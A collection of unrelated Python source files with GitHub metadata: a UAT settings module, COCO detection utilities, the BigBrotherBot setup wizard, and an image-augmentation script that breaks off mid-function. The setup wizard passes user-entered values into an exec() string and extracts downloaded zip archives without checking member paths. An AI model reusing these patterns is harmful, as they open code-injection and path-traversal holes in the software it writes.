5378875ceaf1ee73d1bcd3ca29bc323f6119ee93 | be7f5ea7a9155fed2bbefba78aa36283b66e0f40 | /settings/settings_uat.py | 89abb957dbd3ff38d5427948271d30e380ac9285 | [] | no_license | omprakash1989/AttendanceClock | 6629f3ced980eba4fb5a3b9dde80b1d1f2c0690f | 2e94471d566ef1368b0dad63c757d31cd46d223e | refs/heads/master | 2022-12-12T16:16:47.732793 | 2019-09-13T12:05:29 | 2019-09-13T12:05:29 | 207,900,967 | 0 | 0 | null | 2022-12-07T23:53:59 | 2019-09-11T20:28:55 | Python | UTF-8 | Python | false | false | 795 | py | """
UAT settings file.
Creds and values to be retrieved from environment.
"""
import os
import enum
from api.punching_clock.helpers.misc_helper import get_bool_value
ENV = 'uat'
DEBUG = False
SQLALCHEMY_DATABASE_URI = os.environ['SQLALCHEMY_DATABASE_URI']
TESTING = False
LIMITER = int(os.environ.get('LIMITER', 0))
AWS_BUCKET = os.environ['AWS_BUCKET']
AWS_ACCESS_KEY = os.environ['AWS_ACCESS_KEY']
AWS_SECRET_KEY = os.environ['AWS_SECRET_KEY']
SENTRY_DSN = os.environ.get('SENTRY_DSN', '')
SQLALCHEMY_TRACK_MODIFICATIONS = get_bool_value(os.environ.get('SQLALCHEMY_TRACK_MODIFICATIONS', 'False'))
TEST_BASE_URL = ''
TEST_SQLALCHEMY_DATABASE_URI = ''
REFRESH_DAYS = int(os.environ.get('REFRESH_DAYS', 40))
REDIS_HOST = os.environ['REDIS_HOST']
REDIS_PORT = int(os.environ['REDIS_PORT'])
| [
"oppradhan2011@gmail.com"
] | oppradhan2011@gmail.com |
d5c7839562ccd3a282f87ec69b453e84b3a68d46 | d669d3e44519a39db064aa94a341606649108b15 | /utils_cv/detection/references/coco_utils.py | 90d77c307dd8598bb6516e08be25f4997cd4d5fe | [
"BSD-3-Clause",
"MIT",
"Apache-2.0",
"LGPL-2.1-or-later"
] | permissive | abuendia/computervision-recipes | f1da7c9ebfd4c5a8555de646c806121be2058d49 | 870ef17447282804810ba2499af1f1e4cc17c55f | refs/heads/master | 2021-01-16T12:17:37.016759 | 2020-03-02T20:48:23 | 2020-03-02T20:48:22 | 243,116,856 | 1 | 0 | MIT | 2020-03-02T20:48:24 | 2020-02-25T22:31:14 | Jupyter Notebook | UTF-8 | Python | false | false | 8,869 | py | import copy
import os
import torch
import torch.utils.data
import torchvision
from pycocotools import mask as coco_mask
from pycocotools.coco import COCO
from . import transforms as T
class FilterAndRemapCocoCategories(object):
def __init__(self, categories, remap=True):
self.categories = categories
self.remap = remap
def __call__(self, image, target):
anno = target["annotations"]
anno = [obj for obj in anno if obj["category_id"] in self.categories]
if not self.remap:
target["annotations"] = anno
return image, target
anno = copy.deepcopy(anno)
for obj in anno:
obj["category_id"] = self.categories.index(obj["category_id"])
target["annotations"] = anno
return image, target
def convert_coco_poly_to_mask(segmentations, height, width):
masks = []
for polygons in segmentations:
rles = coco_mask.frPyObjects(polygons, height, width)
mask = coco_mask.decode(rles)
if len(mask.shape) < 3:
mask = mask[..., None]
mask = torch.as_tensor(mask, dtype=torch.uint8)
mask = mask.any(dim=2)
masks.append(mask)
if masks:
masks = torch.stack(masks, dim=0)
else:
masks = torch.zeros((0, height, width), dtype=torch.uint8)
return masks
class ConvertCocoPolysToMask(object):
def __call__(self, image, target):
w, h = image.size
image_id = target["image_id"]
image_id = torch.tensor([image_id])
anno = target["annotations"]
anno = [obj for obj in anno if obj["iscrowd"] == 0]
boxes = [obj["bbox"] for obj in anno]
# guard against no boxes via resizing
boxes = torch.as_tensor(boxes, dtype=torch.float32).reshape(-1, 4)
boxes[:, 2:] += boxes[:, :2]
boxes[:, 0::2].clamp_(min=0, max=w)
boxes[:, 1::2].clamp_(min=0, max=h)
classes = [obj["category_id"] for obj in anno]
classes = torch.tensor(classes, dtype=torch.int64)
segmentations = [obj["segmentation"] for obj in anno]
masks = convert_coco_poly_to_mask(segmentations, h, w)
keypoints = None
if anno and "keypoints" in anno[0]:
keypoints = [obj["keypoints"] for obj in anno]
keypoints = torch.as_tensor(keypoints, dtype=torch.float32)
num_keypoints = keypoints.shape[0]
if num_keypoints:
keypoints = keypoints.view(num_keypoints, -1, 3)
keep = (boxes[:, 3] > boxes[:, 1]) & (boxes[:, 2] > boxes[:, 0])
boxes = boxes[keep]
classes = classes[keep]
masks = masks[keep]
if keypoints is not None:
keypoints = keypoints[keep]
target = {}
target["boxes"] = boxes
target["labels"] = classes
target["masks"] = masks
target["image_id"] = image_id
if keypoints is not None:
target["keypoints"] = keypoints
# for conversion to coco api
area = torch.tensor([obj["area"] for obj in anno])
iscrowd = torch.tensor([obj["iscrowd"] for obj in anno])
target["area"] = area
target["iscrowd"] = iscrowd
return image, target
def _coco_remove_images_without_annotations(dataset, cat_list=None):
def _has_only_empty_bbox(anno):
return all(any(o <= 1 for o in obj["bbox"][2:]) for obj in anno)
def _count_visible_keypoints(anno):
return sum(
sum(1 for v in ann["keypoints"][2::3] if v > 0) for ann in anno
)
min_keypoints_per_image = 10
def _has_valid_annotation(anno):
# if it's empty, there is no annotation
if len(anno) == 0:
return False
# if all boxes have close to zero area, there is no annotation
if _has_only_empty_bbox(anno):
return False
# keypoints task have a slight different critera for considering
# if an annotation is valid
if "keypoints" not in anno[0]:
return True
# for keypoint detection tasks, only consider valid images those
# containing at least min_keypoints_per_image
if _count_visible_keypoints(anno) >= min_keypoints_per_image:
return True
return False
assert isinstance(dataset, torchvision.datasets.CocoDetection)
ids = []
for ds_idx, img_id in enumerate(dataset.ids):
ann_ids = dataset.coco.getAnnIds(imgIds=img_id, iscrowd=None)
anno = dataset.coco.loadAnns(ann_ids)
if cat_list:
anno = [obj for obj in anno if obj["category_id"] in cat_list]
if _has_valid_annotation(anno):
ids.append(ds_idx)
dataset = torch.utils.data.Subset(dataset, ids)
return dataset
def convert_to_coco_api(ds):
coco_ds = COCO()
ann_id = 0
dataset = {"images": [], "categories": [], "annotations": []}
categories = set()
for img_idx in range(len(ds)):
# find better way to get target
# targets = ds.get_annotations(img_idx)
img, targets = ds[img_idx]
image_id = targets["image_id"].item()
img_dict = {}
img_dict["id"] = image_id
img_dict["height"] = img.shape[-2]
img_dict["width"] = img.shape[-1]
dataset["images"].append(img_dict)
bboxes = targets["boxes"]
bboxes[:, 2:] -= bboxes[:, :2]
bboxes = bboxes.tolist()
labels = targets["labels"].tolist()
areas = targets["area"].tolist()
iscrowd = targets["iscrowd"].tolist()
if "masks" in targets:
masks = targets["masks"]
# make masks Fortran contiguous for coco_mask
masks = masks.permute(0, 2, 1).contiguous().permute(0, 2, 1)
if "keypoints" in targets:
keypoints = targets["keypoints"]
keypoints = keypoints.reshape(keypoints.shape[0], -1).tolist()
num_objs = len(bboxes)
for i in range(num_objs):
ann = {}
ann["image_id"] = image_id
ann["bbox"] = bboxes[i]
ann["category_id"] = labels[i]
categories.add(labels[i])
ann["area"] = areas[i]
ann["iscrowd"] = iscrowd[i]
ann["id"] = ann_id
if "masks" in targets:
ann["segmentation"] = coco_mask.encode(masks[i].numpy())
if "keypoints" in targets:
ann["keypoints"] = keypoints[i]
ann["num_keypoints"] = sum(k != 0 for k in keypoints[i][2::3])
dataset["annotations"].append(ann)
ann_id += 1
dataset["categories"] = [{"id": i} for i in sorted(categories)]
coco_ds.dataset = dataset
coco_ds.createIndex()
return coco_ds
def get_coco_api_from_dataset(dataset):
for _ in range(10):
if isinstance(dataset, torchvision.datasets.CocoDetection):
break
if isinstance(dataset, torch.utils.data.Subset):
dataset = dataset.dataset
if isinstance(dataset, torchvision.datasets.CocoDetection):
return dataset.coco
return convert_to_coco_api(dataset)
class CocoDetection(torchvision.datasets.CocoDetection):
def __init__(self, img_folder, ann_file, transforms):
super(CocoDetection, self).__init__(img_folder, ann_file)
self._transforms = transforms
def __getitem__(self, idx):
img, target = super(CocoDetection, self).__getitem__(idx)
image_id = self.ids[idx]
target = dict(image_id=image_id, annotations=target)
if self._transforms is not None:
img, target = self._transforms(img, target)
return img, target
def get_coco(root, image_set, transforms, mode="instances"):
anno_file_template = "{}_{}2017.json"
PATHS = {
"train": (
"train2017",
os.path.join(
"annotations", anno_file_template.format(mode, "train")
),
),
"val": (
"val2017",
os.path.join(
"annotations", anno_file_template.format(mode, "val")
),
),
# "train": ("val2017", os.path.join("annotations", anno_file_template.format(mode, "val")))
}
t = [ConvertCocoPolysToMask()]
if transforms is not None:
t.append(transforms)
transforms = T.Compose(t)
img_folder, ann_file = PATHS[image_set]
img_folder = os.path.join(root, img_folder)
ann_file = os.path.join(root, ann_file)
dataset = CocoDetection(img_folder, ann_file, transforms=transforms)
if image_set == "train":
dataset = _coco_remove_images_without_annotations(dataset)
# dataset = torch.utils.data.Subset(dataset, [i for i in range(500)])
return dataset
def get_coco_kp(root, image_set, transforms):
return get_coco(root, image_set, transforms, mode="person_keypoints")
| [
"jiata@microsoft.com"
] | jiata@microsoft.com |
7078f79ce0aa416ba0757fc8e9c47eee9a3dab23 | 59662e1e55aeac1a6d88081bc839707a4731c8bc | /b3/setup.py | cc545dd4ff42b33311368f7b4e5b1d6d1cb67f97 | [] | no_license | spacepig/big-brother-bot | 7f63fc2430e285f8f1139cba60e66eca426b67c5 | 1bd4eadb634664aaa74299cb2aa710c3ea48bb1b | refs/heads/master | 2021-01-24T02:17:16.119597 | 2010-03-21T00:15:03 | 2010-03-21T00:15:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,880 | py | #!/usr/bin/env python
#
# BigBrotherBot(B3) (www.bigbrotherbot.com)
# Copyright (C) 2009 Mark "xlr8or" Weirath
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
__author__ = 'xlr8or'
__version__ = '0.2.0'
import platform, urllib2, shutil, os, sys, time, zipfile
from functions import main_is_frozen
from distutils import version
from lib.elementtree.SimpleXMLWriter import XMLWriter
from urlparse import urlsplit
from cStringIO import StringIO
class Setup:
_pver = sys.version.split()[0]
_indentation = " "
_priority = 1
_config = "b3/conf/b3.xml"
_buffer = ''
_equaLength = 15
_PBSupportedParsers = ['cod','cod2','cod4','cod5']
def __init__(self, config=None):
if config:
self._config = config
if self.getB3Path() != "":
self._config = self.getB3Path() + "\\conf\\b3.xml"
print self._config
self.introduction()
self.clearscreen()
self._outputFile = self.raw_default("Location and name of the configfile", self._config)
#Creating Backup
self.backupFile(self._outputFile)
self.runSetup()
raise SystemExit('Restart B3 or reconfigure B3 using option: -s')
def runSetup(self):
global xml
xml = XMLWriter(self._outputFile)
# write appropriate header
xml.declaration()
xml.comment("This file is generated by the B3 setup Procedure. ")
xml.comment("If you want to regenerate this file and make sure the format is")
xml.comment("correct, you can invoke the setup procedure by ")
xml.comment("running B3 (b3_run.py) with the option -s. ")
# first level
configuration = xml.start("configuration")
xml.data("\n ")
# B3 settings
self.add_buffer('--B3 SETTINGS---------------------------------------------------\n')
xml.start("settings", name="b3")
self.add_set("parser", "cod", "Define your game: cod/cod2/cod4/cod5/iourt41/etpro/wop/smg")
self.add_set("database", "mysql://b3:password@localhost/b3", "Your database info: [mysql]://[db-user]:[db-password]@[db-server]/[db-name]")
self.add_set("bot_name", "b3", "Name of the bot")
self.add_set("bot_prefix", "^0(^2b3^0)^7:", "Ingame messages are prefixed with this code, you can use colorcodes")
self.add_set("time_format", "%I:%M%p %Z %m/%d/%y")
self.add_set("time_zone", "CST", "The timezone your bot is in")
self.add_set("log_level", "9", "How much detail in the logfile: 9 = verbose, 10 = debug, 21 = bot, 22 = console")
self.add_set("logfile", "b3.log", "Name of the logfile the bot will generate")
xml.data("\n ")
xml.end()
xml.data("\n ")
# server settings
self.add_buffer('\n--GAME SERVER SETTINGS------------------------------------------\n')
xml.start("settings", name="server")
self.add_set("rcon_password", "", "The RCON pass of your gameserver")
self.add_set("port", "28960", "The port the server is running on")
# determine if ftp functionality is available
if version.LooseVersion(self._pver) < version.LooseVersion('2.6.0'):
self.add_buffer('\n NOTE for game_log:\n You are running python '+self._pver+', ftp functionality\n is not available prior to python version 2.6.0\n')
else:
self.add_buffer('\n NOTE for game_log:\n You are running python '+self._pver+', the gamelog may also be\n ftp-ed in.\nDefine game_log like this:\n ftp://[ftp-user]:[ftp-password]@[ftp-server]/path/to/games_mp.log\n')
self.add_set("game_log", "games_mp.log", "The gameserver generates a logfile, put the path and name here")
self.add_set("public_ip", "127.0.0.1", "The public IP your gameserver is residing on")
self.add_set("rcon_ip", "127.0.0.1", "The IP the bot can use to send RCON commands to (127.0.0.1 when on the same box)")
# determine if PunkBuster is supported
if self._set_parser in self._PBSupportedParsers:
self.add_set("punkbuster", "on", "Is the gameserver running PunkBuster Anticheat: on/off")
else:
self.add_set("punkbuster", "off", "Is the gameserver running PunkBuster Anticheat: on/off", silent=True)
xml.data("\n ")
xml.end()
xml.data("\n ")
# messages settings
self.add_buffer('\n--MESSAGES------------------------------------------------------\n')
xml.start("settings", name="messages")
self.add_set("kicked_by", "%s^7 was kicked by %s^7 %s")
self.add_set("kicked", "%s^7 was kicked %s")
self.add_set("banned_by", "%s^7 was banned by %s^7 %s")
self.add_set("banned", "%s^7 was banned %s")
self.add_set("temp_banned_by", "%s^7 was temp banned by %s^7 for %s^7 %s")
self.add_set("temp_banned", "%s^7 was temp banned for %s^7 %s")
self.add_set("unbanned_by", "%s^7 was un-banned by %s^7 %s")
self.add_set("unbanned", "%s^7 was un-banned %s")
xml.data("\n ")
xml.end()
xml.data("\n ")
# plugins settings
self.add_buffer('\n--PLUGIN CONFIG PATH--------------------------------------------\n')
xml.start("settings", name="plugins")
self.add_set("external_dir", "@b3/extplugins")
xml.data("\n ")
xml.end()
xml.data("\n ")
# plugins
self.add_buffer('\n--INSTALLING PLUGINS--------------------------------------------\n')
xml.start("plugins")
self.add_plugin("censor", "@b3/conf/plugin_censor.xml")
self.add_plugin("spamcontrol", "@b3/conf/plugin_spamcontrol.xml")
self.add_plugin("tk", "@b3/conf/plugin_tk.xml")
self.add_plugin("stats", "@b3/conf/plugin_stats.xml")
self.add_plugin("pingwatch", "@b3/conf/plugin_pingwatch.xml")
self.add_plugin("adv", "@b3/conf/plugin_adv.xml")
self.add_plugin("status", "@b3/conf/plugin_status.xml")
self.add_plugin("welcome", "@b3/conf/plugin_welcome.xml")
if self._set_punkbuster == "on":
self.add_plugin("punkbuster", "@b3/conf/plugin_punkbuster.xml")
xml.data("\n ")
else:
xml.data("\n ")
xml.comment("The punkbuster plugin was not installed since punkbuster is not supported or disabled.")
xml.data(" ")
# ext plugins
xml.comment("The next plugins are external, 3rd party plugins and should reside in the external_dir.")
self.add_plugin("xlrstats", self._set_external_dir+"/conf/xlrstats.xml")
#self.add_plugin("registered", self._set_external_dir+"/conf/plugin_registered.xml", "Trying to download Registered", "http://www.bigbrotherbot.com/forums/downloads/?sa=downfile&id=22")
# final comments
xml.data("\n ")
xml.comment("You can add new/custom plugins to this list using the same form as above.")
xml.data(" ")
xml.comment("Just make sure you don't have any duplicate priority values!")
xml.data(" ")
xml.end()
xml.data("\n")
xml.close(configuration)
self.add_buffer('\n--FINISHED CONFIGURATION----------------------------------------\n')
def add_explanation(self, etext):
_prechar = "> "
print _prechar+etext
def add_buffer(self, addition, autowrite=True):
self._buffer += addition
if autowrite:
self.writebuffer()
def writebuffer(self):
self.clearscreen()
print self._buffer
def equaLize(self, _string):
return (self._equaLength-len(str(_string)))*" "
def add_set(self, sname, sdflt, explanation="", silent=False):
"""
A routine to add a setting with a textnode to the config
Usage: self.add_set(name, default value optional-explanation)
"""
xml.data("\n ")
if explanation != "":
self.add_explanation(explanation)
xml.comment(explanation)
xml.data(" ")
if not silent:
_value = self.raw_default(sname, sdflt)
else:
_value = sdflt
xml.element("set", _value, name=sname)
#store values into a variable for later use ie. enabling the punkbuster plugin.
exec("self._set_"+str(sname)+" = \""+str(_value)+"\"")
if not silent:
self.add_buffer(str(sname)+self.equaLize(sname)+": "+str(_value)+"\n")
def add_plugin(self, sname, sconfig, explanation=None, downlURL=None):
"""
A routine to add a plugin to the config
Usage: self.add_plugin(pluginname, default-configfile, optional-explanation)
Priority is increased automatically.
"""
_q = "Install "+sname+" plugin? (yes/no)"
_test = self.raw_default(_q, "yes")
if _test != "yes":
return None
if downlURL:
self.download(downlURL)
if explanation:
self.add_explanation(explanation)
_config = self.raw_default("config", sconfig)
xml.data("\n ")
xml.element("plugin", name=sname, priority=str(self._priority), config=_config)
self.add_buffer("plugin: "+str(sname)+", priority: "+str(self._priority)+", config: "+str(_config)+"\n")
self._priority += 1
def raw_default(self, prompt, dflt=None):
if dflt:
prompt = "%s [%s]" % (prompt, dflt)
else:
prompt = "%s" % (prompt)
res = raw_input(prompt+self.equaLize(prompt)+": ")
if not res and dflt:
res = dflt
if res == "":
print "ERROR: No value was entered! Give it another try!"
res = self.raw_default(prompt, dflt)
self.testExit(res)
return res
def clearscreen(self):
if platform.system() in ('Windows', 'Microsoft'):
os.system('cls')
else:
os.system('clear')
def backupFile(self, _file):
print "\n--BACKUP/CREATE CONFIGFILE--------------------------------------\n"
print " Trying to backup the original "+_file+"..."
if not os.path.exists(_file):
print "\n No backup needed.\n A file with this location/name does not yet exist,\n I'm about to generate a new config file!\n"
self.testExit()
else:
try:
_stamp = time.strftime("-%d_%b_%Y_%H.%M.%S", time.gmtime())
_fname = _file+_stamp+".xml"
shutil.copy(_file, _fname)
print " Backup success, "+_file+" copied to : %s" % _fname
print " If you need to abort setup, you can restore by renaming the backup file."
self.testExit()
except OSError, why:
print "\n Error : %s\n" % str(why)
self.testExit()
def introduction(self):
try:
_uname = platform.uname()[1]+", "
except:
_uname = "admin, "
self.clearscreen()
print " WELCOME "+_uname+"TO THE B3 SETUP PROCEDURE"
print "----------------------------------------------------------------"
print "We're about to generate a main configuration file for "
print "BigBrotherBot. This procedure is initiated when:\n"
print " 1. you run B3 with the option --setup or -s"
print " 2. the config you're trying to run does not exist"
print " ("+self._config+")"
print " 3. you did not modify the distributed b3.xml prior to"
print " starting B3."
self.testExit()
print "We will prompt you for each setting. We'll also provide default"
print "values inside [] if applicable. When you want to accept a"
print "default value you will only need to press Enter."
print ""
print "If you make an error at any stage, you can abort the setup"
print "procedure by typing \'abort\' at the prompt. You can start"
print "over by running B3 with the setup option: python b3_run.py -s"
self.testExit()
print "First you will be prompted for a location and name for this"
print "configuration file. This is for multiple server setups, or"
print "if you want to run B3 from a different setup file for your own."
print "reasons. In a basic single instance install you will not have to"
print "change this location and/or name. If a configuration file exists"
print "we will make a backup first and tag it with date and time, so"
print "you can always revert to a previous version of the config file."
print ""
print "This procedure is new, bugs may be reported on our forums at"
print "www.bigbrotherbot.com"
self.testExit(_question='[Enter] to continue to generate the configfile...')
def testExit(self, _key='', _question='[Enter] to continue, \'abort\' to abort Setup: ', _exitmessage='Setup aborted, run python b3_run.py -s to restart the procedure.'):
if _key == '':
_key = raw_input('\n'+_question)
if _key != 'abort':
print "\n"
return
else:
raise SystemExit(_exitmessage)
def getB3Path(self):
if main_is_frozen():
# which happens when running from the py2exe build
return os.path.dirname(sys.executable)
return ""
def getAbsolutePath(self, path):
"""Return an absolute path name and expand the user prefix (~)"""
if path[0:4] == '@b3/':
path = os.path.join(self.getB3Path(), path[4:])
return os.path.normpath(os.path.expanduser(path))
def url2name(self, url):
return os.path.basename(urlsplit(url)[2])
def download(self, url, localFileName = None):
absPath = self.getAbsolutePath(self._set_external_dir)
localName = self.url2name(url)
req = urllib2.Request(url)
r = urllib2.urlopen(req)
if r.info().has_key('Content-Disposition'):
# If the response has Content-Disposition, we take file name from it
localName = r.info()['Content-Disposition'].split('filename=')[1]
if localName[0] == '"' or localName[0] == "'":
localName = localName[1:-1]
elif r.url != url:
# if we were redirected, the real file name we take from the final URL
localName = url2name(r.url)
if localFileName:
# we can force to save the file as specified name
localName = localFileName
localName = absPath+"/packages/"+localName
f = open(localName, 'wb')
f.write(r.read())
f.close()
self.extract(localName, absPath)
def extract(self, filename, dir):
zf = zipfile.ZipFile( filename )
namelist = zf.namelist()
dirlist = filter( lambda x: x.endswith( '/' ), namelist )
filelist = filter( lambda x: not x.endswith( '/' ), namelist )
# make base
pushd = os.getcwd()
if not os.path.isdir( dir ):
os.mkdir( dir )
os.chdir( dir )
# create directory structure
dirlist.sort()
for dirs in dirlist:
dirs = dirs.split( '/' )
prefix = ''
for dir in dirs:
dirname = os.path.join( prefix, dir )
if dir and not os.path.isdir( dirname ):
os.mkdir( dirname )
prefix = dirname
# extract files
for fn in filelist:
try:
out = open( fn, 'wb' )
buffer = StringIO( zf.read( fn ))
buflen = 2 ** 20
datum = buffer.read( buflen )
while datum:
out.write( datum )
datum = buffer.read( buflen )
out.close()
finally:
print fn
os.chdir( pushd )
if __name__ == '__main__':
#from b3.fake import fakeConsole
#from b3.fake import joe
#from b3.fake import simon
Setup('test.xml')
| [
"xlr8or@xlr8or.com"
] | xlr8or@xlr8or.com |
9ce1793c5864c4d76e8ce99b894826a84f834417 | 14736881216888f4233dfe8a355a8aefe518cdbf | /old_files/augmentv1.2.py | 06121106490b2987cf952714c8f17dcdaceb026c | [
"MIT"
] | permissive | JuanFuriaz/donkey_share | 8c9fa59a2c7f8c0610aa2e13a4eb853244808001 | caad831ca21094f05f9084f881ca3bbfa4168e4c | refs/heads/master | 2020-12-26T05:45:36.400501 | 2020-08-09T17:38:07 | 2020-08-09T17:38:07 | 237,402,679 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,119 | py | """
Script to augment teaching data
version 1.2
Usage:
augment.py --path=<records_dir> --out=<target_dir> [--method=all|classic|gaussian|threshold|canny|style_aug] --gpu_enabled=1
Options:
-h --help Show this screen.
--path TUBPATHS Path of the record directory
--out MODELPATH Path of the model file
Todo:
- add parser
- change function's input to args
- dont copy origin images
- create folder with tub name: example: tub_10-22-12_candy
- FUTURE have both options of creating folder OR giving array
- multiple folder arrays with subcomand, example of options
-all: do everything
-trad: traditional augmentation
       -candy: candy style-transfer augmentation
...
"""
from docopt import docopt
from PIL import Image
import numpy as np
import cv2
import glob
import json
import re
import copy
import shutil
import os
from collections import deque
from os import sys
# user defined imports
import styleaug.cv
from styleaug.cv import ImgGaussianBlur
from styleaug.cv import ImgThreshold
from styleaug.cv import ImgCanny
from styleaug.cv_stylaug import ImgStyleAug
def ensure_directory(directory):
    """Create *directory* (including parents) if it does not exist.

    Uses ``os.makedirs(..., exist_ok=True)`` instead of a separate
    ``os.path.exists`` check, which was racy: another process could
    create the directory between the check and the create and the old
    code would then raise ``FileExistsError``.
    """
    os.makedirs(directory, exist_ok=True)
def print_progress(count, total, name='', bar_length=20):
    """Render a single-line, carriage-return progress bar.

    Only redraws every 10th step (and on the final step) to keep console
    output cheap.  On completion a newline is emitted so the bar is not
    overwritten by subsequent output.
    """
    if count % 10 != 0 and count != total:
        return
    # Keep the exact original expressions: int(bar_length * count / total)
    # and 100 * (count / total) to avoid float-rounding differences.
    filled = int(bar_length * count / total)
    ticks = '=' * filled + '-' * (bar_length - filled)
    print('\r %s\t |%s| %.1f%% %s' % (name, ticks, 100 * (count / total), 'done'), end='\r')
    if count == total:
        print()
def initialize_records(records, path, out, target_dir):
    """Count the input records and optionally seed the output directory.

    When *out* differs from *path*, a ``<out>/<target_dir>`` directory is
    created and ``meta.json``, every record JSON and its referenced
    camera image are copied into it; otherwise the records are only
    counted and *path* itself is returned as the target.

    Fixes vs. the original: the builtin ``sum`` is no longer shadowed,
    and the location comparison uses ``!=`` instead of ``is not`` —
    identity comparison on strings would have treated two equal path
    strings as different locations and copied a dataset onto itself.

    :param records: iterable of ``(record_id, record_json_path)`` pairs
    :param path: directory holding the source records and images
    :param out: parent directory for the copied dataset
    :param target_dir: name of the directory to create under *out*
    :return: tuple ``(record_count, target_path)``
    """
    count = 0
    copy_needed = path != out
    if copy_needed:
        target_path = '%s/%s' % (out, target_dir)
        ensure_directory(target_path)
        shutil.copy('%s/meta.json' % path, target_path)
    else:
        target_path = path
    for _, record in records:
        count += 1
        if copy_needed:
            with open(record, 'r') as record_file:
                data = json.load(record_file)
            img_path = data['cam/image_array']
            shutil.copy(record, target_path)
            shutil.copy('%s/%s' % (path, img_path), target_path)
    return (count, target_path)
# TODO: better place for global stuff
# Global round counter: each call to augmentation_round() bumps it and
# uses it as the numeric prefix of the output directory ("<n>_<name>").
round_number = 0
def augmentation_round(in_path, out, total, name, augment_function, meta_function=None):
    """Run one augmentation pass over every record in *in_path*.

    Each ``record_*.json`` file is read in ascending id order, its
    referenced camera image is loaded, and both are handed to
    ``write()`` which applies *augment_function* and persists the result
    into a fresh ``<out>/<round_number>_<name>`` directory.

    :param in_path: directory containing record_*.json files and images
    :param out: parent directory for the generated round directory
    :param total: expected record count (only used for the progress bar)
    :param name: label for this round, used in directory and file names
    :param augment_function: callable ``(img, data) -> (new_img, new_data)``
    :param meta_function: optional transform applied to the parsed
        meta.json dict; when ``None`` meta.json is copied verbatim
    :return: tuple ``(processed_count, target_directory)``
    """
    global round_number
    round_number += 1
    target = '%s/%s_%s' % (out, round_number, name)
    records = glob.glob('%s/record*.json' % in_path)
    # Pair each record path with its numeric id so iteration below can
    # be sorted by id rather than by (arbitrary) glob order.
    records = ((int(re.search('.+_(\d+).json', path).group(1)), path) for path in records)
    ensure_directory(target)
    if (meta_function is not None):
        with open('%s/meta.json' % in_path, 'r') as meta_file:
            raw_data = json.load(meta_file)
        new_data = meta_function(raw_data)
        with open('%s/meta.json' % target, 'w') as outfile:
            json.dump(new_data, outfile)
    else:
        shutil.copy('%s/meta.json' % in_path, target)
    count = 0
    for _, record in sorted(records):
        with open(record, 'r') as record_file:
            data = json.load(record_file)
        img_path = data['cam/image_array']
        img = Image.open('%s/%s' % (in_path, img_path))
        img = np.array(img)
        # `_` is the record id parsed from the filename above.
        write(target, _, img, data, name, augment_function)
        count = count + 1
        print_progress(count, total, name)
    return (count, target)
def write(out, id, img, data, name, augment_function):
    """Apply *augment_function* to one record and persist the result.

    The augmented image is written as ``<id>_<name>.jpg`` inside *out*
    and the updated record dict (with ``cam/image_array`` pointing at
    the new image) as ``record_<id>.json``.  When the augment function
    signals "skip" by returning ``None`` for either the image or the
    data, nothing is written.
    """
    aug_img, aug_data = augment_function(img, data)
    if aug_img is None or aug_data is None:
        # Item dropped by the augment function (e.g. not enough history yet).
        return
    image_name = '%d_%s.jpg' % (id, name)
    aug_data['cam/image_array'] = image_name
    cv2.imwrite('%s/%s' % (out, image_name), aug_img)
    with open('%s/record_%d.json' % (out, id), 'w') as record_out:
        json.dump(aug_data, record_out)
# TODO: better place for global stuff
# Shared state for augment_history(): one bounded deque per record key.
# History augmentation only starts emitting records once HISTORY_LENGTH
# samples have been buffered.
HISTORY_LENGTH = 50
# Number of records seen so far across all augment_history() calls.
current_history_length = 0
# Maps record key -> deque(maxlen=HISTORY_LENGTH) of recent values.
history_buffer = {}
def gen_history_meta(old_meta):
    """Return a deep copy of *old_meta* extended with history fields.

    For every entry in ``inputs`` a matching ``history/<input>`` entry
    is appended, and every entry in ``types`` gains a ``<type>_array``
    counterpart.  The original dict is left untouched.
    """
    new_meta = copy.deepcopy(old_meta)
    new_meta['inputs'] += ['history/%s' % key for key in old_meta['inputs']]
    new_meta['types'] += ['%s_array' % key for key in old_meta['types']]
    return new_meta
def augment_history(img, data):
    """Attach the last HISTORY_LENGTH values of every record field.

    Stateful: each call appends the current values of *data* to the
    module-level ``history_buffer`` (one bounded deque per key) and
    bumps ``current_history_length``.  Until ``HISTORY_LENGTH`` records
    have been seen, ``(None, None)`` is returned so the caller skips the
    record; afterwards a deep copy of *data* is returned with an added
    ``history/<key>`` list per key.  Relies on records being fed in
    chronological order.
    """
    global current_history_length
    global history_buffer
    data_with_history = copy.deepcopy(data)
    data_keys = data.keys()
    for key in data_keys:
        if (key not in history_buffer):
            # Lazily create one bounded buffer per record key.
            history_buffer[key] = deque(maxlen=HISTORY_LENGTH)
        history_buffer[key].append(data[key])
    current_history_length += 1
    # Not enough context yet: signal the caller to drop this record.
    if (current_history_length < HISTORY_LENGTH):
        return (None, None)
    # TODO: this includes also the current value
    for key in data_keys:
        history_key = 'history/%s' % key
        data_with_history[history_key] = list(history_buffer[key])
    return (img, data_with_history)
def aug_flip(inputs, outputs):
    """Mirror augmentation for (inputs, outputs) pairs.

    Flips the camera image (``inputs[0]``) horizontally and negates the
    steering angle (``outputs[0]``); the throttle (``outputs[1]``) is
    kept unchanged.  *inputs* is not mutated — a deep copy is returned
    with the flipped image in slot 0.
    """
    flipped_img = cv2.flip(inputs[0], 1)
    mirrored_outputs = [-outputs[0], outputs[1]]
    mirrored_inputs = copy.deepcopy(inputs)
    mirrored_inputs[0] = flipped_img
    return mirrored_inputs, mirrored_outputs
def aug_brightness(inputs, outputs):
    """Randomly scale image brightness; outputs pass through unchanged.

    The value (V) channel of the image in HSV space is multiplied by a
    random factor in [0.5, 1.5) and clipped to 255 before converting
    back to BGR.  A deep copy of *inputs* is returned with the
    brightness-adjusted image in slot 0.
    """
    hsv = cv2.cvtColor(inputs[0], cv2.COLOR_BGR2HSV)
    hsv = np.array(hsv, dtype=np.float64)
    factor = .5 + np.random.uniform()
    hsv[:, :, 2] = hsv[:, :, 2] * factor
    # Clip overflow before casting back to uint8.
    hsv[:, :, 2][hsv[:, :, 2] > 255] = 255
